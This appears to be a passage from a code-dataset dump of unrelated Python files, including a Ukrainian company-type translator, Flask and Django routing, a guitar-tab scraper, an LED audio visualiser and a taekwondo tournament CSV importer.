\"філія (інший відокремлений підрозділ)\": 'branch (separate unit)',\n 'організація орендарів': 'organization of tenants',\n 'недержавний пенсійний фонд': 'private pension fund',\n 'державна акціонерна компанія (товариство)': 'state-controlled joint-stock company',\n 'господарські товариства': 'business partnership',\n 'представництво': 'agency',\n \"об'єднання профспілок\": 'trade union association',\n 'гаражний кооператив': 'garage cooperative',\n 'приватне акціонерне товариство': 'private joint-stock company',\n 'садівниче товариство': 'gardeners partnership',\n 'публічне акціонерне товариство': 'public joint-stock company',\n 'творча спілка (інша професійна організація)':\n 'creative union (professional organization)',\n 'житлово-будівельний кооператив': 'house construction cooperative',\n 'казенне підприємство': 'state-run enterprise',\n 'сімейне підприємство': 'family enterprise',\n 'організація покупців': 'consumers association',\n 'підприємець-фізична особа': 'private entrepreneur',\n 'індивідуальне підприємство': 'sole proprietorship',\n 'органи адвокатського самоврядування': \"lawyers` self-government body\",\n 'холдингова компанія': 'holding company',\n \"адвокатське об'єднання\": \"lawyers` union\",\n 'адвокатське бюро': 'law firm',\n 'судова система': 'judiciary',\n \"асоціації органів місцевого самоврядування та їх добровільні обєднання\":\n 'associations of local government bodies and their voluntary associations',\n 'кооперативний банк': 'cooperative bank',\n 'аудиторська палата україни': 'the auditors chamber of ukraine',\n 'приватна 
компанія з обмеженою відповідальністю': 'private limited company',\n 'благодійне товариство': 'charitable incorporated organisation',\n 'приватна компанія з відповідальністю, обмеженою гарантіями її членів':\n 'pri/ltd by guar/nsc (private, limited by guarantee, no share capital)',\n 'компанія суспільних інтересів': 'community interest company',\n 'зареєстроване товариство': 'registered society',\n 'обмежене партнерство': 'limited partnership',\n 'королівська статутна компанія': 'royal charter company',\n 'партнерство з обмеженою відповідальністю': 'limited liability partnership',\n (\"приватна компанія з відповідальністю, обмеженою гарантіями її членів з використанням 'обмеженої' пільги\"):\n (\"pri/lbg/nsc (private, limited by guarantee, no share capital, use of 'limited' exemption)\"),\n 'шотландське благодійне товариство': 'scottish charitable incorporated organisation',\n 'приватна компанія з необмеженою відповідальністю': 'private unlimited company',\n 'давно існуюча публічна компанія': 'old public company',\n 'товариство': 'private unlimited',\n 'шотландське партнерство': 'scottish partnership',\n 'інвестиційна компанія зі змінним капіталом (цінні папери)':\n 'investment company with variable capital (securities)',\n 'інвестиційна компанія зі змінним капіталом':\n 'investment company with variable capital',\n 'промислове товариство взаємного кредиту': 'industrial and provident society',\n \"інвестиційна компанія зі змінним капіталом ('парасолькова компанія')\":\n 'investment company with variable capital(umbrella)',\n ('приватна компанія з обмеженою відповідальністю згідно підрозділу 30 закону'\n ' о компаніях'):\n 'priv ltd sect. 30 (private limited company, section 30 of the companies act)',\n 'європейське публічне товариство з обмеженою відповідальністю':\n \"european public limited-liability company (se)\",\n 'перероблена/закрита': 'converted/closed',\n 'компанія з розділеними портфелями': 'protected cell company',\n 'публічна акціонерна компанія з обмеженою відповідальністю': 'public limited company',\n 'додаткова освіта та передуніверситетський коледж/коледжний корпус':\n 'further education and sixth form college corps',\n 'приватна/компанія з відповідальністю, обмеженою гарантіями її членів/без акціонерного капіталу, використання \"обмеженої\" пільги (або привілегії)':\n \"pri/lbg/nsc (private, limited by guarantee, no share capital, use of 'limited' exemption)\",\n 'публічна компанія великобританії з обмеженою відповідальністю':\n 'united kingdom societas',\n 'консорціум великобританії': 'united kingdom economic interest grouping',\n }\n self.all_ukr_company_type_dict = self.put_objects_to_dict('name', \"business_register\",\n \"CompanyType\")\n self.all_eng_company_type_dict = self.put_objects_to_dict('name_eng',\n \"business_register\",\n \"CompanyType\")\n super().__init__()\n\n def translate_company_type_name_eng(self, name_eng):\n for key, value in self.COMPANY_TYPES_UK_EN.items():\n if value == name_eng:\n return key\n return None\n\n def create_company_type(self, name, name_eng):\n company_type = CompanyType.objects.create(name=name, name_eng=name_eng)\n self.all_ukr_company_type_dict[name] = company_type\n self.all_eng_company_type_dict[name_eng] = company_type\n print(f'New company type: id={company_type.id}, name={company_type.name}, name_eng={company_type.name_eng}')\n send_new_company_type_message(company_type)\n return company_type\n\n def save_or_get_company_type(self, type_from_record, locale):\n if locale == 'uk':\n name = type_from_record.lower()\n 
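# look in the preloaded in-memory cache first; an unseen type is created and a notification email is sent (see create_company_type above)\n            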
company_type = self.all_ukr_company_type_dict.get(name)\n            if not company_type:\n                name_eng = self.COMPANY_TYPES_UK_EN.get(name)\n                company_type = self.create_company_type(name, name_eng)\n        elif locale == 'en':\n            name_eng = type_from_record.lower()\n            company_type = self.all_eng_company_type_dict.get(name_eng)\n            if not company_type:\n                name = self.translate_company_type_name_eng(name_eng)\n                company_type = self.create_company_type(name, name_eng)\n        else:\n            raise ValueError(f'This parameter is not valid - {locale}. Should be \"uk\" or \"en\"')\n        return company_type\n","sub_path":"business_register/converter/company_converters/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":14479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"328463218","text":"from frankenstein.server import views, app\n\nroutes = {\n    '/projects': (views.assemble_project, ['GET']),\n    '/projects/': (views.download_project, ['GET']),\n    '/parts': (views.view_parts, ['GET']),\n}\n\n\ndef add_routes():\n    for rule, endpoint_info in routes.items():\n        route_name = endpoint_info[0].__name__\n        app.add_url_rule(rule, route_name, view_func=endpoint_info[0], methods=endpoint_info[1])\n","sub_path":"frankenstein/server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"546061103","text":"from typing import List\n\nclass Solution:\n    def matrixScore(self, A: List[List[int]]) -> int:\n        row = len(A)\n        col = len(A[0])\n\n\n\n        # first make every row start with a 1 (flip the whole row if its leading bit is 0)\n        for i in range(row):\n            if A[i][0]==0:\n                for j in range(len(A[i])):\n                    A[i][j]=1-A[i][j]\n        # for each later column: flip it when zeros dominate, keep it when ones dominate\n        for i in range(1,col):\n            num0 = 0\n            num1 = 0\n            # count the zeros and ones in this column\n            for k in range(row):\n                if A[k][i]==0:\n                    num0 +=1\n                else:\n                    num1 +=1\n            if num1 < num0:\n                for k in range(row):\n                    A[k][i] = 1-A[k][i]\n        # read each row as a binary number and add them up\n        ans = 0\n        for i in range(row):\n            for j in range(col):\n                ans += A[i][j] << (col-1-j)\n        return ans\n Annotated field {}'.format(field_name))\n        except Exception as E:\n            pass\n            ## print('Error while annotating {}: {}'.format(field_name, E))\n\n\ndef load_stats(filename, dataset = u'IBEMC'):\n    Fieldstats.objects.all().delete()\n    with open(filename, 'r') as csvfile:\n        reader = csv.DictReader(csvfile, delimiter = '\\t')\n        for row in reader:\n            try:\n                field_name = row['field_name']\n                field_label = row['field_label']\n                ep = int(row['EP']) if row['EP'] else None\n                ea = int(row['EA']) if row['EA'] else None\n                np = int(row['NP']) if row['NP'] else None\n                na = int(row['NA']) if row['NA'] else None\n                fa = int(row['FA']) if row['FA'] else None\n\n                fs = Fieldstats()\n                fs.dataset = dataset\n                fs.field_name = field_name\n                fs.field_label = field_label\n                fs.ep = ep\n                fs.ea = ea\n                fs.np = np\n                fs.na = na\n                fs.fa = fa\n\n                fs.save()\n\n            except Exception as Ex:\n                print('Error while loading field stats for {}'.format(field_name))\n                print(Ex)\n\n\nclass Command(BaseCommand):\n    \"\"\"Load field stats into hub database\n\n    \"\"\"\n    help = 'Load field stats into hub database'\n\n    option_list = BaseCommand.option_list + (\n        make_option(\n            '--stats_file',\n            dest='stats_file',\n            help='File containing stats on fields.',\n        ),\n    )\n\n    def handle(self, *args, **options):\n        print('Start...')\n        filename = options['stats_file']\n        load_stats(filename)\n        print('Done.')\n","sub_path":"ibemc/management/commands/load_fieldstats.py","file_name":"load_fieldstats.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"487514889","text":"from datasette import hookimpl\nfrom datasette.utils.asgi import 
Response\n\n\nasync def write(request, datasette):\n    if not await datasette.permission_allowed(\n        request.actor, \"datasette-write\", default=False\n    ):\n        return Response.html(\"Permission denied for datasette-write\", status=403)\n    databases = [db for db in datasette.databases.values() if db.is_mutable]\n    if request.method == \"GET\":\n        return Response.html(\n            await datasette.render_template(\n                \"datasette_write.html\",\n                {\"databases\": databases, \"sql\": request.args.get(\"sql\") or \"\"},\n                request=request,\n            )\n        )\n    elif request.method == \"POST\":\n        formdata = await request.post_vars()\n        database_name = formdata[\"database\"]\n        sql = formdata[\"sql\"]\n        try:\n            database = [db for db in databases if db.name == database_name][0]\n        except IndexError:\n            return Response.html(\"Database not found\", status=404)\n\n        error = None\n        result = None\n        message = None\n        try:\n            result = await database.execute_write(sql, block=True)\n            if result.rowcount == -1:\n                message = \"Query executed\"\n            else:\n                message = \"{} row{} affected\".format(\n                    result.rowcount, \"\" if result.rowcount == 1 else \"s\"\n                )\n        except Exception as e:\n            error = e\n            message = str(e)\n        datasette.add_message(\n            request, message, type=datasette.INFO if result else datasette.ERROR,\n        )\n        return Response.redirect(\"/-/write\")\n    else:\n        return Response.html(\"Bad method\", status=405)\n\n\n@hookimpl\ndef register_routes():\n    return [\n        (r\"^/-/write$\", write),\n    ]\n\n\n@hookimpl\ndef permission_allowed(actor, action):\n    if action == \"datasette-write\" and actor and actor.get(\"id\") == \"root\":\n        return True\n","sub_path":"datasette_write/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576223803","text":"from django.urls import path\nfrom . 
import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nurlpatterns = [\n path('', views.register, name='register'),\n path('profile/', views.profile, name='profile'),\n path('editar/', views.editar, name='editar'),\n path('feed/', views.feed, name='feed'),\n path('crear/', LoginView.as_view(template_name='principal/crear.html'), name=\"crear\"),\n path('login/', LoginView.as_view(template_name='principal/login.html'), name='login'),\n path('logout/', LogoutView.as_view(template_name='principal/logout.html'), name='logout'),\n]","sub_path":"principal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450607573","text":"\"\"\"\nThis module contains all the methods you need for scraping either a single tab file or a predefined set of tab files\nfrom the Internet.\n\"\"\"\n\nfrom selenium import webdriver\nfrom os import path\nfrom googlesearch import search\n\n\ndef download_tab(tab_url: str, tab_directory: str, tab_name: str) -> (bool, str):\n \"\"\"\n Download a tab file from the Internet, using the tab_url and place it in the tab_directory, called tab_name.\n Return a message indicating success or failure.\n\n :param tab_url: Location of the tab file on the Internet\n :param tab_directory: Local directory where the tab file should be placed on your machine\n :param tab_name: File name of your tab file\n :return: Boolean and str message, indicating success or failure\n \"\"\"\n\n target_path = path.join(tab_directory, tab_name)\n if path.isfile(target_path):\n return False, None\n\n try:\n browser = webdriver.Firefox()\n browser.get(tab_url)\n # tab_text = browser.find_element_by_xpath(\"//pre[@class='_3F2CP _1rDYL']\").text\n tab_text = browser.find_element_by_xpath(\"//code[@class='_3enQP']\").text\n # _3F2CP _1rDYL _3F2CP _1rDYL _3F2CP _3hukP\n browser.close()\n\n with open(target_path, 'w') as f:\n f.write(tab_text)\n except Exception:\n browser.quit()\n return False, 'Error downloading ' + tab_name + ' on ' + tab_url\n return True, 'Download succeeded'\n\n\ndef download_data_set_from_csv(csv_path: str, tab_directory: str):\n \"\"\"\n Download a data set of tab files, as specified by the csv file in csv_path, and put them into tab_directory.\n If a tab file cannot be downloaded successfully, for example because the file already existed or because the\n Internet connection broke down, then the function continues with downloading the other tab files. After trying to\n download all prescribed tab files, this function returns a message indicating the number of tab files that were\n downloaded successfully and the number of tab files for which the download failed.\n\n :param csv_path: Path to the csv file with lines in format [url];[name];[key];[filename] (for example IndexTabs.csv)\n :param tab_directory: Local location for the downloaded files\n \"\"\"\n nr_successful = 0\n nr_unsuccessful = 0\n\n # Open the csv file\n with open(csv_path, 'r') as read_file:\n csv_content = read_file.readlines()\n for line in csv_content:\n parts = line.rstrip().split(';')\n tab_url = parts[0]\n tab_name = parts[3]\n success, message = download_tab(tab_url, tab_directory, tab_name)\n if success:\n nr_successful += 1\n else:\n nr_unsuccessful += 1\n if message:\n print(message)\n\n print(str(nr_successful) + ' tab files were downloaded successfully. 
' + str(nr_unsuccessful) + ' failed.')\n\n\ndef search_tabs(song_title='', artist_name='', limit=6, absolute_write_path=''):\n    all_urls = []\n    for url in search(f'{song_title}-{artist_name} ultimate-guitar chords', stop=int(limit/2)):\n        all_urls.append(url)\n    for url in search(f'{song_title} ultimate-guitar chords', stop=int(limit/2)):\n        all_urls.append(url)\n    return all_urls\n\n\ndef download_tabs_from_url_list(url_list, absolute_write_path, song_title, artist_name):\n    for i, url in enumerate(url_list):\n        download_tab(url, absolute_write_path, f\"{song_title}-{artist_name}_{i}\")\n","sub_path":"decibel/file_scraper/tab_scraper.py","file_name":"tab_scraper.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"378396367","text":"import math\n\n\nrebro = 4\nradius = 0.001\nvolume = rebro ** 3\nn = 0.000001\nARRAY=[]\n\n\ndef toFixed(numObj,digits=3):\n    return f\"{numObj:.{digits}f}\"\ndef max_coefficient(radius=radius,n=n,ARRAY=ARRAY):\n    while radius > 0:\n\n        x = rebro / (2 * radius)\n        z = int(((math.sqrt(6)) / 2) * (x - 1) + 1)\n        y = int((2 * (x - 1) * math.sqrt(3) / 3) + 1)\n        xy = (2 * x - 1) * y\n\n        N = xy * (int(z / 2) + z % 2)\n        amount = (4 * math.pi * radius ** 3) * N / 3\n        coefficient = (amount / volume)*100\n\n        rad = float(toFixed(radius))\n        coefficient = float(toFixed(coefficient))\n        ARRAY.append([coefficient, rad])\n        radius = radius - n\n\n\n    return ARRAY\n\n\nSTAS = max_coefficient()\n\n\nwith open('coefficients.txt', 'w') as outfile:\n    for i in STAS:\n        outfile.write('{} {}\\n'.format(i[0], i[1]))\n\n\nmax_coeff = max(i[0] for i in STAS)\nprint(\"Maximum fill coefficient - {}%\".format(max_coeff))\n","sub_path":"kursach/max_coefficient.py","file_name":"max_coefficient.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"637448661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSample report generation script from pbpython.com\n\nThis program takes an input Excel file, reads it and turns it into a\npivot table.\n\nThe output is saved in multiple tabs in a new Excel file.\n\"\"\"\n\nimport argparse\nimport pandas as pd\nimport numpy as np\n\n\ndef create_pivot(infile, index_list=[\"Manager\", \"Rep\", \"Product\"],\n                 value_list=[\"Price\", \"Quantity\"]):\n    \"\"\"\n    Read in the Excel file, create a pivot table and return it as a DataFrame\n    \"\"\"\n    df = pd.read_excel(infile)\n    table = pd.pivot_table(df, index=index_list,\n                           values=value_list,\n                           aggfunc=[np.sum, np.mean], fill_value=0)\n    return table\n\n\ndef save_report(report, outfile):\n    \"\"\"\n    Take a report and save it to a single Excel file\n    \"\"\"\n    writer = pd.ExcelWriter(outfile)\n    for manager in report.index.get_level_values(0).unique():\n        temp_df = report.xs(manager, level=0)\n        temp_df.to_excel(writer, manager)\n    writer.save()\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='Script to generate sales report')\n    parser.add_argument('infile', type=argparse.FileType('r'),\n                        help=\"report source file in Excel\")\n    parser.add_argument('outfile', type=argparse.FileType('w'),\n                        help=\"output file in Excel\")\n    args = parser.parse_args()\n    # We need to pass the full file name instead of the file object\n    sales_report = create_pivot(args.infile.name)\n    save_report(sales_report, 
args.outfile.name)\n\n","sub_path":"all-gists/ba3f37dd7c52077d4eeb/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"439730642","text":"\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.template.defaultfilters import slugify\nfrom optparse import make_option\nimport argparse\nfrom taekwondo.models import *\nimport csv, os\nfrom datetime import datetime \nfrom unidecode import unidecode\nfrom django.db.models import Q\nfrom django.core.exceptions import ObjectDoesNotExist\nimport collections\n\nclass Command(BaseCommand):\n\n help = 'Sæki bardaga frá mótum úr CSV skrá frá TKÍ'\n #club_list = list(Club.objects.all())\n option_list = BaseCommand.option_list + (\n make_option(\n \"-f\", \n \"--file\", \n dest = \"filename\",\n help = \"specify import file\", \n metavar = \"FILE\"\n ),\n\n ) \n\n def get_fight_info(self, item):\n \n self.fight_info = (\n ('tournament_name', item[0]),\n ('fight_number', item[1]),\n ('age_division', item[2]),\n ('belt_group', item[3]),\n ('weight_group', item[4]),\n ('gender', item[5]),\n ('red_club', item[6]),\n ('blue_club', item[7]),\n ('red_player', item[8]),\n ('blue_player', item[9]),\n ('red_points', item[10]),\n ('blue_points', item[11]),\n )\n self.fight_info = collections.OrderedDict(self.fight_info)\n return self.fight_info\n\n def update_csv(self, updated_fight_info):\n updated_csv = self.original_csv.strip('.csv')+'-updated.csv'\n print(list(updated_fight_info.values()))\n with open(updated_csv, 'a', newline='') as f:\n writer = csv.writer(f, delimiter=';')\n writer.writerow(list(updated_fight_info.values()))\n\n def compare_members(self, _member, _club):\n selection = {}\n print('Reyni að prenta %s' % _member)\n try:\n member_list = list(Member.objects.filter(name__istartswith=_member.split()[0]))\n print('')\n print('\"%s\" í félaginu \"%s\" fannst ekki í FELIX. Var hann skráður með öðru nafni á mótið?' % (_member, _club))\n print('')\n\n if len(member_list) >= 1:\n print('### Listi með öllum iðkendum úr FELIX með sama fornafn ###')\n #print(member_list)\n else:\n print('### Enginn iðkandi með nafnið \"%s\" fannst í FELIX ###' % _member)\n \n selection[0] = ['Bæta við \"%s\" sem nýjum iðkanda' % _member]\n print('%s. %s' % (0, selection.get(0)))\n \n for i, member in enumerate(member_list):\n i = i+1\n selection[i] = [member, member.active_club]\n print('%s. %s - %s' % (i, member.name, member.active_club))\n \n \n while True:\n try:\n user_input = int(input('Veldu númer: '))\n except ValueError:\n print('Þetta er ekki tölustafur!')\n else:\n if 0 <= user_input <= len(member_list):\n break\n else:\n print('Kommon, tölu úr listanum maður!')\n\n\n \n if user_input == 0:\n m = Member(name=_member, slug=slugify(unidecode(_member)))\n m.save()\n ms = Membership(member=m, club=_club, date_joined=datetime.now())\n ms.save()\n\n return m\n\n else:\n print('Tengi \"%s\" við \"%s\"' % (_member, selection.get(user_input)[0]))\n return selection.get(user_input)[0] \n\n except IndexError:\n print('Tókst ekki að leita eftir \"%s\"' % _member.split()[0])\n \n def validate_member(self, _member, _club):\n try:\n m = Member.objects.get(name=_member)\n print('\"%s\" fannst í FELIX, tengi við færslu.' 
% _member)\n return m\n\n except ObjectDoesNotExist:\n print('\"%s\" fannst ekki, kíkjum aðeins betur á þetta' % _member)\n return self.compare_members(_member, _club)\n\n except MultipleObjectsReturned:\n print('\"%s\" fannst oftar en einusinni' % _member)\n \n\n #rint('%s var búinn til!' % blue_player)\n \n \n\n \n\n #user_selection = selection.get(int(user_input))\n \n \n\n #print(user_selection)\n \n '''\n for i, member in enumerate(member_list):\n if i==int(user_input):\n return member\n #user_input = input('Uhh, \"%s\" already exists, continue?' % member)\n '''\n\n def get_winner(self, red, blue, red_points, blue_points):\n if (int(blue_points) > int(red_points)):\n return blue\n return red\n\n def fight_import(self, item):\n #print(self.club_list)\n tournament_list = list(Tournament.objects.all())\n tournament_exists = False\n\n fight_info = self.get_fight_info(item)\n\n for listed_tournament in tournament_list:\n if listed_tournament.title in fight_info.get('tournament_name'):\n tournament_exists = True\n tournament_obj = listed_tournament\n \n \n\n if tournament_exists:\n print('Mót með heitinu \"%s\" er nú þegar til, bæti við bardaga ... ' % (fight_info.get('tournament_name')))\n\n tournament_age_division, created = TournamentCategoryItem.objects.get_or_create(\n category_type=1,\n title=fight_info.get('age_division')\n )\n\n tournament_weight_group, created = TournamentCategoryItem.objects.get_or_create(\n category_type=2,\n title=fight_info.get('weight_group')\n )\n\n tournament_belt_group, created = TournamentCategoryItem.objects.get_or_create(\n category_type=3,\n title=fight_info.get('belt_group')\n )\n\n division, created = TournamentDivision.objects.get_or_create(\n title='%s - %s - %s' % (\n tournament_age_division.title,\n tournament_weight_group.title,\n tournament_belt_group.title,\n ),\n tournament=tournament_obj,\n age = tournament_age_division,\n weight = tournament_weight_group,\n grade = tournament_belt_group,\n gender = 1\n )\n\n #if not (fight_info.get('red_club')=='' or fight_info.get('red_club')==''):\n \n blue_club, created = Club.objects.get_or_create(\n slug=slugify(unidecode(fight_info.get('blue_club'))),\n defaults= {\n 'name': fight_info.get('blue_club'),\n 'short_name': fight_info.get('blue_club'),\n }\n )\n \n \n red_club, created = Club.objects.get_or_create(\n slug=slugify(unidecode(fight_info.get('red_club'))),\n defaults= {\n 'name': fight_info.get('red_club'),\n 'short_name': fight_info.get('red_club'),\n }\n\n )\n\n\n blue_player = self.validate_member(fight_info.get('blue_player').strip(), blue_club)\n \n #Checking if members exist before adding them to DB\n #member_qs = (Q(Member.objects.filter(name=fight_info.get('blue_player'))) | Q(Member.objects.filter(name=fight_info.get('red_player'))))):\n '''\n blue_player, created = Member.objects.get_or_create(\n name=fight_info.get('blue_player'),\n slug=slugify(unidecode(fight_info.get('blue_player'))),\n )\n '''\n\n #blue_membership = Membership(club=blue_club, member=blue_player)\n \n \n red_player = self.validate_member(fight_info.get('red_player').strip(), red_club)\n \n '''\n red_player, created = Member.objects.get_or_create(\n name=fight_info.get('red_player'),\n slug=slugify(unidecode(fight_info.get('red_player'))),\n )\n '''\n blue_registration, created = TournamentRegistration.objects.get_or_create(\n member=blue_player,\n tournament=tournament_obj,\n #club=blue_club,\n #registration_date=datetime.now()\n ) \n \n red_registration, created = TournamentRegistration.objects.get_or_create(\n 
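# the red corner's registration is looked up or created exactly like the blue corner's above\n            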
member=red_player,\n tournament=tournament_obj,\n #club=red_club,\n #registration_date=datetime.now()\n ) \n\n\n \n fight, created = Fight.objects.get_or_create(\n division = division,\n fight_number=fight_info.get('fight_number'),\n blue_player=blue_registration,\n red_player=red_registration,\n blue_points=fight_info.get('blue_points'),\n red_points=fight_info.get('red_points'),\n winner=self.get_winner(\n red_registration, \n blue_registration, \n fight_info.get('red_points'),\n fight_info.get('blue_points'),\n )\n )\n fight_info['blue_player'] = blue_player.name\n fight_info['red_player'] = red_player.name\n self.update_csv(fight_info)\n\n elif not tournament_exists:\n print('Mót með heitinu \"%s\" er ekki til, bæti því við núna.... ' % fight_info.get('tournament_name'))\n new_tournament = Tournament(\n title=fight_info.get('tournament_name'), \n date=datetime.now(), \n slug=slugify(unidecode(fight_info.get('tournament_name')))\n )\n new_tournament.save()\n \n \n \n #self.create_membership(m, c)\n \n #def felix2_import(self):\n def get_club(self, club):\n if not 'ÍSÍ' in club:\n print('Fann ekki félag í línunni: ' + club)\n return club.split('/')[-3]\n\n def handle(self, *args, **options):\n\n if options['filename'] == None :\n raise CommandError(\"Option `--file=...` must be specified.\")\n\n # make sure file path resolves\n if not os.path.isfile(options['filename']) :\n raise CommandError(\"File does not exist at the specified path.\")\n\n self.original_csv = options['filename']\n with open(options['filename'], newline='') as f:\n csv_fights = csv.reader(f, delimiter=';')\n #csv_fights = csv.reader(open(options['filename'], newline=''), delimiter=';')\n for i, row in enumerate(csv_fights):\n print(row)\n if not '' in row:\n self.fight_import(row)\n else:\n print('Gat ekki búið til bardaga, upplýsingar vantar í færsluna')\n print(row)\n","sub_path":"tki/taekwondo/management/commands/import_tournaments.py","file_name":"import_tournaments.py","file_ext":"py","file_size_in_byte":11394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"40131722","text":"import time\nimport random\nimport bibliopixel\nfrom bibliopixel.drivers.serial_driver import *\nfrom bibliopixel.led import *\nimport pyaudio\nimport wave\nimport numpy as np\nfrom struct import unpack\nfrom math import *\n\nbibliopixel.log.setLogLevel(bibliopixel.log.DEBUG)\ndriver1 = DriverSerial(num = 600, type = LEDTYPE.WS2811, deviceID = 1)\ndriver2 = DriverSerial(num = 650, type = LEDTYPE.WS2811, deviceID = 2)\nled1 = LEDMatrix(driver1, width=50, height=12, coordMap = None, rotation=MatrixRotation.ROTATE_180, masterBrightness=100, pixelSize=(1,1))\nled2 = LEDMatrix(driver2, width=50, height=13, coordMap = None, rotation=MatrixRotation.ROTATE_180, masterBrightness=100, pixelSize=(1,1))\nchunk = 4096\n\ns = pyaudio.PyAudio()\n\nsound = s.open(format = pyaudio.paInt16, channels = 2, rate = 44100, input = True, frames_per_buffer = chunk, input_device_index=2)\n\ndata = sound.read(chunk)\nwhile True:\n data = sound.read(chunk)\n data = unpack(\"%dh\"%(len(data)/2),data)\n data = np.array(data,dtype='h')\n data = abs(np.fft.rfft(data))\n data = data/100000\n y = 0\n for z in range(0,50):\n gSum=0\n for y in range(y,y+4):\n gSum+=data[y]\n dData=gSum/4\n try:\n t = int(log(dData, 1.35) * log10(z+10))\n except ValueError:\n t = 0\n\n if t>24:\n led1.fillRect(z,0,1,t,color=(255,0,0))\n led2.fillRect(z,0,1,t-12,color=(255,0,0))\n elif t>22:\n led1.fillRect(z,0,1,t,color=(255,255,0))\n 
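# led2 is stacked above led1's 12 rows, so the overflow band is drawn with a 12-row offset (t-12)\n            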
led2.fillRect(z,0,1,t-12,color=(255,255,0))\n elif t>16:\n led1.fillRect(z,0,1,t,color=(0,255,0))\n led2.fillRect(z,0,1,t-12,color=(0,255,0))\n elif t>12:\n led1.fillRect(z,0,1,t,color=(0,0,255))\n led2.fillRect(z,0,1,t-12,color=(0,0,255))\n else:\n led1.fillRect(z,0,1,t,color=(0,0,255))\n led2.fillRect(z,0,1,t-12,color=(0,0,0))\n\n led2.update()\n led2.all_off()\n led1.update()\n led1.all_off()\n\nsound.stop_stream()\n\nsound.close()\ns.terminate()\n","sub_path":"CODE/presets/preset.py","file_name":"preset.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"432832548","text":"\n# Problem: https://www.acmicpc.net/problem/1181\n\nfrom sys import stdin\n\nl = []\nfor _ in range(int(input())):\n s = stdin.readline().rstrip()\n l.append((len(s),s))\n\nprint('\\n'.join([word[1] for word in sorted(set(l))]))\n","sub_path":"python/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426722829","text":"import requests\n\nfrom settings import pingproxy_url, results\n\nwhile True:\n try:\n r = requests.get(pingproxy_url)\n r.raise_for_status()\n except Exception as e:\n print(e)\n results[\"loses\"] += 1\n else:\n results[\"wins\"] += 1\n print(results)\n","sub_path":"pingclient.py","file_name":"pingclient.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519849101","text":"import numpy as np\n\n# Function to bin the spikes of cluster cluster_nbr with bin size time_window\ndef binning(spt_mat,trig,time_window,cluster_nbr,dmr=1,ftsize=22):\n fs=24414.0625\n #DMR delimitation (depending on trigger)\n first_t=np.amin(trig)/fs\n last_t=np.amax(trig)/fs\n\n #Preparing binning,rast_arr has the same duration as the dmr\n N_bins=int((last_t-first_t)/time_window)+1\n rast_arr=np.zeros(N_bins)\n\n #Getting cluster numbers\n N_clu=spt_mat.shape[0]\n list_clu=np.zeros(N_clu)\n\n for clu_ind in range(N_clu):\n list_clu[clu_ind]=spt_mat[clu_ind][0][0][0]\n\n # Figuring last spikes for cluster of interest\n ind_neuron=np.where(list_clu==cluster_nbr)[0][0]\n\n ind_last_spike=np.where(spt_mat[ind_neuron][1]/fs<=last_t)[0][-1]\n ind_first_spike=np.where(spt_mat[ind_neuron][1]/fs>=first_t)[0][0]\n\n #binning\n for t in np.arange(ind_first_spike,ind_last_spike+1):\n ind_bin=int((spt_mat[ind_neuron][1][t][0]/fs-first_t)/time_window)\n rast_arr[ind_bin]+=1\n\n return rast_arr[:-1]\n","sub_path":"binning.py","file_name":"binning.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"489331118","text":"import os\nfrom functools import reduce\n\nimport pandas as pd\nimport numpy as np\n\nfrom . 
import settings\n\n\ndef get_data(cryptocurrency, fillna=0):\n crypto_path = os.path.join(settings.RESOURCES_DIR, cryptocurrency)\n\n # Currency related data frames\n price_df = _read_csv(os.path.join(crypto_path, 'price.csv'))\n _lower_headers(price_df)\n # price_df = _floaterize_prices(price_df)\n price_df['date'] = pd.to_datetime(price_df['date'])\n\n transactions_df = _read_csv(os.path.join(crypto_path, 'transactions.csv'))\n _lower_headers(transactions_df)\n transactions_df['date'] = pd.to_datetime(transactions_df['date'])\n\n # Forum related data frames\n reply_df = _read_csv(os.path.join(crypto_path, 'reply_opinion.csv'))\n _lower_headers(reply_df)\n\n topic_df = _read_csv(os.path.join(crypto_path, 'topic_opinion.csv'))\n _lower_headers(topic_df)\n\n # Categorize vader scores\n reply_df = _transform_vader_series(reply_df, 'reply')\n topic_df = _transform_vader_series(topic_df, 'topic')\n\n # Drop useless columns\n _drop_inplace(reply_df, ['reply', 'vader'])\n _drop_inplace(topic_df, ['topic', 'reply', 'topiccontent', 'vader', 'opinion'])\n\n # Group by date and aggregate vader categorical columns\n reply_df = _fold_categorical_vader(reply_df, 'reply', by='date')\n topic_df = _fold_categorical_vader(topic_df, 'topic', by='date', agg={'views':'sum'})\n\n # Calculate daily 